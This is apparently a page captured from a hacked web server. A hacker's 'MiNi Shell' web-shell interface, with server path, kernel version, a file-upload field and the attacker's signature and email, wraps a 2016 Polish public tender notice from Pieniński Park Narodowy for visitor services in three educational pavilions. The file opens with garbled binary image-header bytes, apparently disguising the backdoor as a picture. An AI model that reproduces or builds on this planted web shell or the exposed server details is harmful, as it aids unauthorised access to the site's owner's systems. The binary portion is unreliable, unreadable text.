JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160112/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160112/8270-N-2016.html

<p class="kh_header"><b>Krościenko nad Dunajcem: Prowadzenie obsługi zwiedzających w pawilonach edukacyjnych Pienińskiego Parku Narodowego</b><br>
<b>Numer ogłoszenia: 8270 - 2016; data zamieszczenia: 12.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pieniński Park Narodowy , ul. Jagiellońska 107, 34-450 Krościenko nad Dunajcem, woj. małopolskie, tel. 18 2625601.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie obsługi zwiedzających w pawilonach edukacyjnych Pienińskiego Parku Narodowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A)	prowadzenie obsługi zwiedzających na terenie przystani flisackiej w Sromowcach Kątach 
w okresach: od 1.04.2016 r. do 31.10.2016 r. oraz od 1.04.2017 r. do 31.10.2017 r., obejmujące 
w szczególności:
-	prowadzenie punktu informacyjnego w pawilonie edukacyjnym PPN na przystani 
w Sromowcach Kątach,
-	utrzymanie porządku i czystości na terenie przystani flisackiej w Sromowcach Kątach.
B) prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Sromowcach Niżnych 
w okresach od 1.04.2016 r. do 31.10.2016 r. oraz od 1.04.2017 r. do 31.10.2017 r., obejmujące 
w szczególności:
-	prowadzenie punktu informacyjnego dla zwiedzających PPN wraz ze sprzedażą wydawnictw,
-	utrzymanie porządku i czystości w pawilonie i jego otoczeniu,
-	prowadzenie sanitariatów w pawilonie.
C) prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Hałuszowej w okresach od 1.04.2016 r. do 31.10.2016 r. oraz od 1.04.2017 r. do 31.10.2017 r., obejmujące w szczególności:
-	prowadzenie punktu informacyjnego dla zwiedzających PPN wraz ze sprzedażą wydawnictw,
-	utrzymanie porządku i czystości w pawilonie i jego otoczeniu,
-	prowadzenie sanitariatów w pawilonie.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 63.51.30.00-8, 90.60.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem uczestnictwa w przetargu jest wpłata wadium. Wadium w wysokości: 2000 zł (słownie: dwa tysiące złotych) na ofertę częściową A - obsługa w pawilonie w Sromowcach Kątach oraz 500 zł (słownie: pięćset złotych) na ofertę częściową B lub C - obsługa w pawilonie w Sromowcach Niżnych lub Hałuszowej, winno być wpłacone na konto Pienińskiego Parku Narodowego w BGK 17 1130 1150 0012 1252 6590 0001 w terminie do 2.02.2016 r. Jeżeli oferent wygrał przetarg na obsługę zwiedzających we więcej niż jednym pawilonie, a następnie odstąpił od podpisania umowy w którejś części zamówienia, wadium na tą część oferty ulega przepadkowi (przykład: oferent wygrywa przetarg w części A,B,C. Podpisuje umowę na część A, ale rezygnuje z części B i C. Skutkiem odstąpienia od podpisania umowy jest przepadek wadium za część B i C tj. 2 x 500 zł). Wadium również ulega przepadkowi, jeżeli oferent, który wygrał przetarg nie podpisał umowy w terminie 7 dni od ogłoszenia wyników</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenia osób zgłoszonych przez oferenta do prowadzenia obsługi zwiedzajacych w pawilonach edukacyjnych PPN</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pieninypn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pieniński Park Narodowy 34-450 Krościenko nad Dunajcem ul. Jagiellońska 107b.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2016 godzina 10:00, miejsce: Pieniński Park Narodowy (sekretariat) 34-450 Krościenko nad Dunajcem ul. Jagiellońska 107b.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prowadzenie obsługi zwiedzających na terenie przystani flisackiej w Sromowcach Kątach 
w okresach: od 1.04.2016 r. do 31.10.2016 r. oraz od 1.04.2017 r. do 31.10.2017 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje obowiązki: 1.	w zakresie obsługi zwiedzających:
a)	udzielanie wszechstronnych informacji na temat Pienińskiego Parku Narodowego, ze szczególnym uwzględnieniem spływu Przełomem Dunajca,
b)	wydawanie bezpłatnych materiałów informacyjnych pobranych od Zleceniodawcy,
c)	zapewnienie wysokiej kultury obsługi.

2.	w zakresie utrzymania porządku:
stałe utrzymanie czystości poprzez regularne sprzątanie z częstotliwością wynikającą 
z bieżących potrzeb oraz codzienne, generalne posprzątanie po zamknięciu kas spływu. 
Zakres prac obejmuje: 
a)	zamiatanie drogi dojścia od parkingu do nabrzeża, schodów na nabrzeżu, drogi wokół pawilonu edukacyjnego, parkingu roboczego, drogi betonowej na nabrzeżu roboczym,  
b)	zbieranie śmieci na całym terenie przystani wraz z nabrzeżem i składem łodzi, na drodze     do przystani roboczej oraz drodze asfaltowej przy przystankach autobusowych od      skrzyżowania z drogą od parkingów, 
c)	koszenie trawników (trawa może dorastać maksymalnie do 8 cm) i bezzwłoczne usunięcie      skoszonej trawy w miejsce wskazane przez Zleceniodawcę, grabienie opadłych igieł sosny      oraz innych liści z trawników, pielęgnacja zieleni, zbieranie kamieni, 
d)	wycinanie roślinności wyrastającej na ciągach komunikacyjnych,
e)	regularne oczyszczanie z roślinności i udrożnienie rowów odpływowych, szczególnie na      początku sezonu (do 10 kwietnia) oraz przed zakończeniem sezonu (po 15 października).
Obszar i zakres prac porządkowych został zaznaczony na dołączonej do umowy mapie przystani. Niedopuszczalne jest wykonywanie prac uciążliwych dla zwiedzających (zamiatanie, koszenie, usuwanie trawy itp.) w czasie obecności turystów na przystani. 
f)	regularne mycie okien, drzwi, szyb gablot i podłogi w pawilonie wystawowym i holu, usuwanie pajęczyn, 
g)	codziennie, przed rozpoczęciem pracy przystani, wycieranie i utrzymanie w czystości ławek na dojściu do nabrzeża, parapetów w holu i pokryw koszy na śmieci 
h)	opróżnianie koszy na śmieci,
i)	niezwłoczne powiadamianie Zleceniodawcy o konieczności wywozu kontenera 
i opróżnienia pełnego zbiornika na nieczystości płynne oraz o zaistniałych awariach. Zgłoszenie telefoniczne należy potwierdzić pisemnie na adres biuro@pieninypn.pl  
j)	wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów 
i rowów dla spływu wody, wymiana żarówek. Koszty tych napraw i zakupu żarówek pokrywa Zleceniobiorca.
k)	prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań zawartych w §3 ust. 2. Koszty tych zakupów w całości pokrywa Zleceniobiorca.
l)	przeniesienie wszystkich, opróżnionych ze śmieci koszy do przejścia między kioskami 
w pawilonie wystawowym. W/w prace należy wykonać w dniu 31 października każdego roku po zamknięciu kas spływu. 
m)	przygotowanie pawilonu i terenu przystani musi odbyć się przed otwarciem sezonu czyli przed dniem 1 kwietnia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.30.00-8, 90.60.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Sromowcach Niżnych 
w okresach od 1.04.2016 r. do 31.10.2016 r. oraz od 1.04.2017 r. do 31.10.2017 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje obowiązki: 1.	w zakresie obsługi zwiedzających:
a)	udzielanie wszechstronnych informacji na temat Pienińskiego Parku Narodowego,
b)	posiadanie w stałej sprzedaży, uzgodnionego ze Zleceniodawcą, zestawu wydawnictw 
oraz pamiątek dotyczących PPN i regionu pienińskiego. Sprzedaż innych towarów wymaga zgody Zleceniodawcy,
c)	wydawanie bezpłatnych materiałów informacyjnych pobranych od Zleceniodawcy,
d)	wyświetlanie filmów dostarczonych przez Zleceniodawcę. Zabrania się wyświetlania innych filmów i programów telewizyjnych,
e)	zapewnienie wysokiej kultury obsługi.

2.	w zakresie utrzymania porządku:
a)	stałe utrzymanie czystości w pawilonie i jego otoczeniu (schody, podcienie, placyk przy ogródku roślin pienińskich, droga przed pawilonem) poprzez regularne sprzątanie 
z częstotliwością wynikającą z potrzeb oraz codzienne generalne posprzątanie po zamknięciu pawilonu.
b)	utrzymanie w należytym stanie ogródka roślin pienińskich,
c)	koszenie trawników i bezzwłoczne usuwanie skoszonej trawy w miejsce wskazane przez
      Zleceniodawcę,  
d)	wycinanie roślinności wyrastającej na ciągach komunikacyjnych,
e)	opróżnianie koszy na śmieci,
f)	niezwłoczne powiadamianie PPN o konieczności wywozu kontenera oraz o zaistniałych awariach. Zgłoszenie telefoniczne należy potwierdzić pisemnie na adres biuro@pieninypn.pl 
g)	wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów 
i rowów dla spływu wody, wymiana żarówek - na wystawie wyłącznie na żarówki LED. Koszty tych napraw i zakupu żarówek pokrywa Zleceniobiorca.
h)	prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań zawartych w §3 ust.2. Koszty tych zakupów w całości pokrywa Zleceniobiorca.
i)	przeniesienie opróżnionych ze śmieci koszy do pomieszczenia toalety w pawilonie wystawowym. W/w prace należy wykonać w dniu 31 października każdego roku. 
j)	przygotowanie pawilonu i terenu wokół pawilonu musi odbyć się przed otwarciem sezonu czyli przed dniem 1 kwietnia.
Obszar i zakres prac porządkowych został zaznaczony na dołączonej do umowy mapie.
Niedopuszczalne jest wykonywanie prac uciążliwych dla zwiedzających (koszenie i usuwanie trawy, zamiatanie itp.) w czasie obecności turystów w pawilonie lub w jego otoczeniu.

3.	w zakresie prowadzenia sanitariatów:
a)	codzienne otwarcie toalet w godzinach otwarcia pawilonu,
b)	utrzymanie porządku i czystości pomieszczeń,
c)	zapewnienie stałego wyposażenia w: papier toaletowy w każdej kabinie (zabrania się wydzielania papieru), ręczniki papierowe i mydło w płynie w każdym zasobniku, środki zapachowe, kosze w kabinach i na zużyte ręczniki papierowe, szczotki do muszli, środki dezynfekcyjne,
d)	bieżącą konserwację, naprawę i ewentualną wymianę urządzeń umożliwiających ich prawidłowe funkcjonowanie,
e)	usuwanie niedrożności przewodów odpływowych od urządzeń sanitarnych,
f)	realizację poleceń Państwowej Inspekcji Sanitarnej i innych właściwych służb sanitarnych. Zleceniobiorca ponosi pełną odpowiedzialność za przestrzeganie wymogów higieny określonych właściwymi przepisami,
g)	zapewnienie stałego dostępu do ciepłej wody,
h)	codzienną dezynfekcję urządzeń sanitarnych,
i)	występowanie w schludnym stroju.
Zabrania się wieszania, poza istniejącymi urządzeniami, czegokolwiek na ścianach, drzwiach, oknach, kabinach itd. oraz wstawiania mebli.
Za korzystanie z sanitariatów Zleceniobiorca może pobierać opłaty. Opłata ta nie może jednak przekroczyć 1,50 zł od osoby. Opłat nie pobiera się od uczestników zajęć edukacyjnych prowadzonych przez pracowników Pienińskiego Parku Narodowego z uczniami ze szkół czterech gmin pienińskich.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.30.00-8, 90.60.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Hałuszowej w okresach od 1.04.2016 r. do 31.10.2016 r. oraz od 1.04.2017 r. do 31.10.2017 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje obowiązki: 1.	w zakresie obsługi zwiedzających:
a)	udzielanie wszechstronnych informacji na temat Pienińskiego Parku Narodowego,
b)	posiadanie w stałej sprzedaży, uzgodnionego ze Zleceniodawcą zestawu wydawnictw oraz pamiątek dotyczących PPN i regionu pienińskiego. Sprzedaż innych towarów wymaga zgody Zleceniodawcy,
c)	wydawanie bezpłatnych materiałów informacyjnych pobranych od Zleceniodawcy,
d)	wyświetlanie filmów dostarczonych przez Zleceniodawcę. Zabrania się wyświetlania innych filmów i programów telewizyjnych,
e)	zapewnienie wysokiej kultury obsługi.

2.	w zakresie utrzymania porządku:
a)  stałe utrzymanie czystości w pawilonie i jego otoczeniu (schody, podcienie, placyk przed
      pawilonem, droga przed pawilonem) poprzez regularne sprzątanie z częstotliwością
      wynikającą z potrzeb oraz codzienne generalne posprzątanie po zamknięciu pawilonu,
b)   koszenie trawników i bezzwłoczne usuwanie skoszonej trawy w miejsce wskazane przez
      Zleceniodawcę,  
c)   wycinanie roślinności wrastającej w kostkę brukową na ciągach komunikacyjnych i na
      placu przed wejściem na schody, 
d)   regularne zamiatanie i usuwanie liści z placu przed wejściem na schody,
e)   opróżnianie koszy na śmieci,
f) niezwłoczne powiadamianie PPN o konieczności wywozu kontenera oraz o zaistniałych 
 awariach. Zgłoszenie telefoniczne należy potwierdzić pisemnie na adres biuro@pieninypn.pl 
g)  wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów i rowów
      dla spływu wody, wymiana żarówek. Koszty tych napraw i zakupu żarówek pokrywa
      Zleceniobiorca
h)  prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań zawartych 
      w §3 ust.2. Koszty tych zakupów w całości pokrywa Zleceniobiorca.
i)    przygotowanie pawilonu i terenu wokół pawilonu musi odbyć się przed otwarciem sezonu
 czyli przed dniem 1 kwietnia.

Obszar i zakres prac porządkowych został zaznaczony na dołączonej do umowy mapie. 
Niedopuszczalne jest wykonywanie prac uciążliwych dla zwiedzających (koszenie i usuwanie trawy, zamiatanie itp.) w czasie obecności turystów w pawilonie lub w jego otoczeniu.

3.	w zakresie prowadzenia sanitariatów:
a)	codzienne otwarcie toalet w godzinach otwarcia pawilonu,
b)	utrzymanie porządku i czystości pomieszczeń,
c)	zapewnienie stałego wyposażenia w: papier toaletowy w każdej kabinie (zabrania się wydzielania papieru), ręczniki papierowe i mydło w płynie w każdym zasobniku, środki zapachowe, kosze w kabinach i na zużyte ręczniki papierowe, szczotki do muszli, środki dezynfekcyjne,
d)	bieżącą konserwację, naprawę i ewentualną wymianę urządzeń umożliwiających ich prawidłowe funkcjonowanie,
e)	usuwanie niedrożności przewodów odpływowych od urządzeń sanitarnych,
f)	realizację poleceń Państwowej Inspekcji Sanitarnej i innych właściwych służb sanitarnych. Zleceniobiorca ponosi pełną odpowiedzialność za przestrzeganie wymogów higieny określonych właściwymi przepisami,
g)	zapewnienie stałego dostępu do ciepłej wody,
h)	codzienną dezynfekcję urządzeń sanitarnych,
i)	występowanie w schludnym stroju.
Zabrania się wieszania, poza istniejącymi urządzeniami, czegokolwiek na ścianach, drzwiach, oknach, kabinach itd. oraz wstawiania mebli.
Za korzystanie z sanitariatów Zleceniobiorca może pobierać opłaty. Opłata ta nie może jednak przekroczyć 1,50 zł od osoby. Opłat nie pobiera się od uczestników zajęć edukacyjnych prowadzonych przez pracowników Pienińskiego Parku Narodowego z uczniami ze szkół czterech gmin pienińskich.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.30.00-8, 90.60.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com